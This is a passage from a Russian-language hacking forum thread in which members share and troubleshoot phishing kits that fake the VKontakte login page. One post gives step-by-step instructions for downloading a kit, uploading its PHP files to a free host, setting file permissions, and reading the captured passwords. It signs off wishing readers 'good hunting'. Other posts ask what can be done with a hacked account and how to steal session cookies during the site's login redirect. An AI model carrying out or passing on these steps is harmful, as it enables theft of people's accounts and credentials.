|
|
|
|
#76 | ||
|
Местный
Поблагодарили 11 раз(а) в 5 сообщениях
|
Цитата:
Цитата:
|
||
|
|
|
| Наши Спонсоры | |
|
|
|
|
#77 |
|
Новичок
Поблагодарили 1 раз в 1 сообщении
|
Ребята, - помимо основного,лучшее посоветую от Шумахера:
http://depositfiles.com/files/y7f3t3x3f Вот ссылка рабочих фейков...Если нормальный хост,то все отлично работает...К примеру Контакт...Запускаем FileZilla Client,заливаем на хост 4 файла, файлу base.php ставим права 777...Все пользуемся,просмотр паролей в файле base.php,который лучше просматривать через FileZilla Client... --------------------------------------------- От себя добавлю, я советую на ftp.t35.com - абсолютно без проблем исполняет все на php и не только! Качаете по ссылке что выше от Шумахера (111.zip),- сборник фейков, где в папке (vkontakte.ru)находите 4-позиции(3файла: (index.html),(base.php),(log.php), и папка с шелухой (index_files)), которые тупо обводите мышкой и через CuteFTP-8 (или чем Вы там пользуетесь)- просто заливаете на хост ftp.t35.com! Затем как он и сказал, меняете права файлу base.php на 777. ВсЁ! Всё будет работать без глюков, точняк! --------------------------------------------- Сбор урожая просматривать можно также очень просто, - просто создайте интернет-ярлык на Ваш base.php, что Вы уже разместили например: http://ваш-хост.t35.com/base.php Больше ничего не требуется! Для проверки введите свои реальные логин и пароль, дабы убедиться. Все у Вас и останется, кроме Вас это никуда не уйдет! Приятным будет факт, когда открыв свой base.php вы обнаружите, что у Вас все получилось! Хорошей охоты!
|
|
|
#78 | |
|
Новичок
Поблагодарили 0 раз(а) в 0 сообщениях
|
Всё залил вроде нормально но как только вводили логин и пасс, я пробывал переходить по http://ваш_сайт/seebase.php вот что написало
Цитата:
|
|
|
|
#79 |
|
Новичок
|
есть типа такой же проги называется VKGolosa, тоже своеобразный развод...
Там типа тоже вводишь мыло и пароль а прога отсылает их на твою почту... |
|
|
|
|
|
#80 | |
|
Местный
Поблагодарили 46 раз(а) в 31 сообщениях
|
Цитата:
прочел все посты... нашел не мало фейков...уже готовых.. ![]() надо посмотреть login.php а т и вправду мыло соё впарят и будут улетть чесно скрысинные мыльницы с фейка
|
|
|
|
|
#81 |
|
Новичок
|
Люди,Сори если пишу не в тот раздел !!!Но у мя есть вопрос!!!Вот если я взломал контакт,и там на странице 10696 рейта я могу перекинуть его се на страницу?если да то как?
|
|
|
|
|
|
#82 |
|
Banned
|
нет не сможеш.
|
|
|
|
|
|
#83 |
|
Новичок
|
Жаль!!!А что вообще с ним я смогу сделать?
|
|
|
|
|
|
#84 |
|
Новичок
Поблагодарили 6 раз(а) в 3 сообщениях
|
С рейтингом ничего!
Ты можешь перекинуть только не использованные голоса |
|
|
|
|
|
#85 |
|
Banned
|
че ты паришься? удали все и сделай под свою страницу)
|
|
|
|
|
|
#86 |
|
Новичок
|
Напишите, плиз, сайты, чтобы получить хорошие бесплатные доменные имена
Последний раз редактировалось Ledy Di; 09.03.2010 в 15:51. |
|
|
|
|
|
#87 |
|
Новичок
|
к сожалению хорошие бесплатные доменные имена платные.
подскажите где подешевле можно их купит? |
|
|
|
|
|
#88 |
|
Местный
Поблагодарили 68 раз(а) в 51 сообщениях
|
Уважаемые форумчане!!!если вы выкладываете фейки для контакта...то пусть они будут нормальными шагающими со временем в ногу ....ну куда ето годится... когда берешь ваш фейк а на нем написано (нас уже 6 777222)
вот скажите мне когда в контакте было 6 млн человек ?????лет 40 назад?? неужели так тяжело делать для людей ??? прошу отнестись к сему с пониманием!!! |
|
|
|
|
|
#89 |
|
Новичок
Поблагодарили 1 раз в 1 сообщении
|
а самому слабо поменять?
блокнот в зубы, флаг в руки и вперед |
|
|
|
|
|
#90 |
|
Новичок
|
Народ, подскажите пожалуйста ламеру в этом деле как можно снифнуть вконтакте страницу. Дело в том что на даный момень куки с паролем хранятся в разделе логин.вк.ком (на латиницей), тоесть когда ктото авторизируется, после нажатия клавишы Ентер, происходит автоматический переход на логин.вк.ком (да эта страница создана потому что вконтакте распростер обьятия и на запад)и обратно потом на вконтакте.ру/хххххх, а вот здесь и сложность что слить куки с паролем можно только когда человек на логин.вк.ком, но когда он переходит по ссылке он находится не на нем, тоесть мы получаем никому ненужные данные. Хелпните мне ламеру!!!!
|
|
|
|
![]() |
| Опции темы | |
| Опции просмотра | |
|
|
| Тема | Автор | Раздел | Ответов | Последнее сообщение |
| О взломе поролей и всё,всё,всё | SODC | Расшифровка хешей | 15 | 26.08.2010 22:46 |
| Как узнать пароль контакта жертвы(зная мыло) | b3ck | Сайты, Форумы, CMS | 17 | 24.05.2010 22:05 |
| Отфильтровал "вкусности" | z0mbie | Уязвимости и защита | 4 | 15.10.2009 20:45 |
| Опять фейк вконтакте =) | 11rus | Соц. сети | 6 | 20.08.2009 14:19 |
| [FAQ] Faq по взлому E-mail | hack0sol | Новичкам | 18 | 02.07.2009 19:32 |
Copyright © 2008 - 2010 «HACKER-PRO CLUB» Реклама на сайте Правила Форума Пользовательское соглашение |